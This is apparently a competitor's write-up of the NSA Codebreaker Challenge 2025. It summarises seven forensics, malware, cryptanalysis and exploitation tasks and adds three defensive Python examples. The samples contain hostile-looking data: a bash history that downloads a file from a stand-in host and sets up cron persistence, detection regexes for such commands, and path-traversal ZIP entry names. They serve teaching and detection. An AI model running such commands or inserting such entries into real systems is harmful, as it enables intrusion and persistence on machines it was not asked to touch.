NSA Codebreaker Challenge 2025
Multi-Stage Cybersecurity Investigation — All 7 Tasks Completed
Volatility 3 · Ghidra · Binary Ninja · Wireshark · tshark · GDB · Python
Overview
The NSA Codebreaker Challenge is an annual multi-stage cybersecurity competition run by the National Security Agency. Each task builds on the previous, requiring skills across digital forensics, network forensics, memory forensics, malware analysis, cryptanalysis, vulnerability research, and exploitation. Completing all 7 tasks places participants in a small group of top finishers nationally.
The 7 Tasks
Task 1 — Digital Forensics
Mounted and analyzed a zipped .ext2 filesystem image; analyzed bash history and system logs to identify malicious file installations and reconstruct the full attack timeline.
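To show how the bash history and system logs from such an image can be correlated into a single timeline, here is an added Python example. It is not the challenge's own tooling; both inputs are constructed (the history uses the `#<epoch>` lines bash writes when HISTTIMEFORMAT is set, the log lines follow `journalctl -o short-iso` layout), and the host name, commands and timestamps are hypothetical.

```python
"""Merge a timestamped bash history with system log lines into one attack timeline.

Added example, not the write-up's own code. Inputs are constructed: the history uses
the `#<epoch>` timestamp lines bash writes when HISTTIMEFORMAT is set, the log lines
use `journalctl -o short-iso` layout; host name, commands and times are hypothetical.
"""
from datetime import datetime, timezone
import re

SAMPLE_BASH_HISTORY = """\
#1730462400
ls /tmp
#1730462460
curl -o /tmp/.update http://hypothetical-host.invalid/u
#1730462470
chmod +x /tmp/.update
#1730462480
cp /tmp/.update /usr/local/bin/sysupd
#1730462500
echo '* * * * * root /usr/local/bin/sysupd' > /etc/cron.d/sysupd
"""

SAMPLE_SYSLOG = """\
2024-11-01T11:59:30+0000 router sshd[812]: Accepted password for root from 192.168.3.254 port 51022 ssh2
2024-11-01T12:01:45+0000 router cron[1]: (*system*) RELOAD (/etc/cron.d/sysupd)
2024-11-01T12:02:00+0000 router cron[901]: (root) CMD (/usr/local/bin/sysupd)
"""

# Patterns that indicate installation or persistence rather than ordinary use.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "download"),
    (re.compile(r"chmod\s+\+x\s+/tmp/"), "made /tmp file executable"),
    (re.compile(r"/etc/cron\.d/|crontab"), "cron persistence"),
    (re.compile(r"cp\s+/tmp/\S+\s+/usr/local/bin/"), "staged binary into PATH"),
]


def parse_bash_history(text):
    """Pair each `#epoch` line with the command that follows it."""
    events, ts = [], None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            ts = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif ts is not None and line.strip():
            events.append((ts, "bash", line))
            ts = None  # each timestamp line applies to exactly one command
    return events


def parse_syslog(text):
    """Parse short-iso journal lines into (time, source, message)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, rest = line.split(" ", 1)
        ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%S%z")
        events.append((ts, "syslog", rest))
    return events


def classify(message):
    """Return the labels of every suspicious pattern the message matches."""
    return [label for rx, label in SUSPICIOUS if rx.search(message)]


def build_timeline(history_text, syslog_text):
    """Merge both sources in time order; each entry is (time, source, message, labels)."""
    merged = parse_bash_history(history_text) + parse_syslog(syslog_text)
    merged.sort(key=lambda e: e[0])
    return [(ts, src, msg, classify(msg)) for ts, src, msg in merged]


def flagged_entries(history_text, syslog_text):
    """Only the timeline entries that matched at least one suspicious pattern."""
    return [e for e in build_timeline(history_text, syslog_text) if e[3]]


if __name__ == "__main__":
    for ts, src, msg, labels in build_timeline(SAMPLE_BASH_HISTORY, SAMPLE_SYSLOG):
        print(ts.isoformat(), src, msg, labels or "")
```

Sorting both sources on real timestamps is what lets the login in the system log be placed before the download and cron write in the history, which is the ordering a timeline reconstruction needs; the pattern list is deliberately small and should be extended from what the image actually shows.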
Task 2 — Network Forensics
Analyzed a 2344-packet PCAP using Wireshark/tshark; discovered DNS poisoning through router configuration correlation; identified malicious device IPs (127.4.1.3, 192.168.3.254, 192.168.5.1).
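As an added example of the correlation step (not code from the write-up), the Python below takes DNS responses in the layout `tshark -T fields -e frame.number -e ip.src -e dns.qry.name -e dns.a` produces and flags answers that did not come from the resolver the router is configured to use, or that map a public name to an RFC 1918 address. The sample lines, the configured resolver and the domains are all constructed.

```python
"""Flag DNS answers that contradict a router's configured resolvers.

Added example, not the write-up's code. SAMPLE_TSHARK_LINES is constructed to look
like `tshark -T fields -e frame.number -e ip.src -e dns.qry.name -e dns.a` output
(tab separated, multi-valued fields comma separated); the resolver, names and
addresses are hypothetical.
"""
import ipaddress

# Hypothetical router configuration: the only host clients should receive answers from.
CONFIGURED_RESOLVERS = {"192.168.1.1"}

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

SAMPLE_TSHARK_LINES = """\
12\t192.168.1.1\tupdates.example.com\t93.184.216.34
15\t192.168.3.254\tupdates.example.com\t192.168.5.1
21\t192.168.1.1\tlogin.example.net\t151.101.1.69
27\t192.168.3.254\tlogin.example.net\t192.168.5.1,151.101.1.69
"""


def parse_tshark_fields(text):
    """Turn tab-separated tshark field output into dict records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        frame, src, qname, answers = line.split("\t")
        records.append({
            "frame": int(frame),
            "src": src,
            "qname": qname,
            "answers": [a for a in answers.split(",") if a],
        })
    return records


def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def find_poisoned_answers(records, resolvers=CONFIGURED_RESOLVERS):
    """Return (frame, qname, answer, reason) for every suspicious answer.

    Two checks: the response came from a host that is not a configured resolver,
    or a public name was resolved to a private address, which an upstream resolver
    would not normally hand out.
    """
    findings = []
    for r in records:
        for ans in r["answers"]:
            if r["src"] not in resolvers:
                findings.append((r["frame"], r["qname"], ans,
                                 "response from unconfigured resolver %s" % r["src"]))
            if is_rfc1918(ans):
                findings.append((r["frame"], r["qname"], ans,
                                 "public name resolved to private address"))
    return findings


def conflicting_answers(records):
    """Names that received more than one distinct A record across responders."""
    seen = {}
    for r in records:
        seen.setdefault(r["qname"], set()).update(r["answers"])
    return {name: ips for name, ips in seen.items() if len(ips) > 1}


if __name__ == "__main__":
    recs = parse_tshark_fields(SAMPLE_TSHARK_LINES)
    for f in find_poisoned_answers(recs):
        print("frame %d: %s -> %s (%s)" % f)
    print(conflicting_answers(recs))
```

The resolver set is the piece that has to come from the router configuration; without it, a rogue responder on the LAN looks like any other DNS server in the capture. The second check (conflicting answers for one name) is what makes the poisoning visible even when the rogue responder's address is unknown.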
Task 3 — Memory Forensics
Built a custom Volatility profile using dwarf2json from a kernel image (System.map/vmlinux) for an OpenWrt router; analyzed a memory dump using Volatility and crash utilities; reverse engineered an obfuscated binary using Ghidra/Binary Ninja to reveal a base64-encoded encrypted DNS poisoning configuration not present on disk.
Task 4 — Malware Analysis
Bypassed multi-layer anti-debugging protections (ptrace checks, sigaction signal handlers, /proc/self/status parsing); extracted nested ELF from memfd; reverse engineered an obfuscated dropper; broke AES-128-ECB + RSA + RC4 encryption; recovered C2 server details and malware persistence mechanism.
Task 5 — Cryptanalysis
Identified a critical weakness in key generation (26-bit effective entropy despite 128-bit keys); performed a parallelized dual-layer AES-128-ECB brute-force attack (~67M keys, ~5 min); decrypted captured C2 traffic from PCAP; recovered the Mattermost C2 URL.
Task 6 — Vulnerability Research
Identified an authentication flaw in Mattermost bot channel creation logic; mapped the channel access graph via DFS to discover a privilege escalation path; gained access to adversary C2 infrastructure.
Task 7 — Vulnerability Exploitation
Analyzed an Android ZIP archiver; identified unsafe recursive extraction; bypassed directory constraints via filename encoding; compiled a malicious DEX JAR achieving Remote Code Execution.
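From the defender's side, the fix for this class of archiver bug is to audit every entry name against the extraction root before writing anything. The added Python example below (not the archiver's code) builds a sample archive in memory with one benign entry and several that try to leave the destination, including one whose parent components are percent-encoded; the extra decoding pass is an assumption about archivers that decode entry names before using them, and the destination path is hypothetical.

```python
"""Audit ZIP entry names before extraction so no entry can escape the destination.

Added example, not the archiver's code. The sample archive is constructed in memory;
the percent-decoding pass models an archiver that decodes names before use (an
assumption); DEST is a hypothetical extraction root.
"""
import io
import os
import posixpath
import urllib.parse
import zipfile

DEST = "/tmp/demo-extract"  # hypothetical extraction root


def build_sample_zip():
    """Constructed archive: one benign entry and several that try to leave DEST."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign")
        zf.writestr("../../etc/cron.d/evil", "escape via parent components")
        zf.writestr("/abs/override", "absolute path")
        zf.writestr("dir\\..\\..\\win", "backslash separators")
        zf.writestr("%2e%2e/encoded", "percent-encoded parent component")
    return buf.getvalue()


def candidate_names(name):
    """Yield the raw name plus any decoded variant an archiver might actually use."""
    yield name
    decoded = urllib.parse.unquote(name)  # assumption: archiver percent-decodes names
    if decoded != name:
        yield decoded


def entry_is_safe(name, dest=DEST):
    """True only if every variant of the name stays inside dest after normalization."""
    for n in candidate_names(name):
        if "\\" in n or "\x00" in n:       # separators/terminators other layers may honour
            return False
        if posixpath.isabs(n):
            return False
        if ".." in n.split("/"):
            return False
        target = posixpath.normpath(posixpath.join(dest, n))
        if posixpath.commonpath([dest, target]) != dest:
            return False
    return True


def audit_zip(data, dest=DEST):
    """Return (accepted, rejected) entry-name lists for an in-memory archive."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            (accepted if entry_is_safe(info.filename, dest) else rejected).append(info.filename)
    return accepted, rejected


def safe_extract(data, dest):
    """Extract only audited entries, writing each under dest explicitly (no extractall)."""
    accepted, _ = audit_zip(data, dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in accepted:
            target = os.path.join(dest, name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())
    return accepted


if __name__ == "__main__":
    ok, bad = audit_zip(build_sample_zip())
    print("accepted:", ok)
    print("rejected:", bad)
```

The check deliberately rejects on any variant of the name rather than trying to guess which decoding the rest of the pipeline applies; the final commonpath test catches anything the component checks miss, and extraction writes each accepted entry itself instead of trusting a library's recursive extraction.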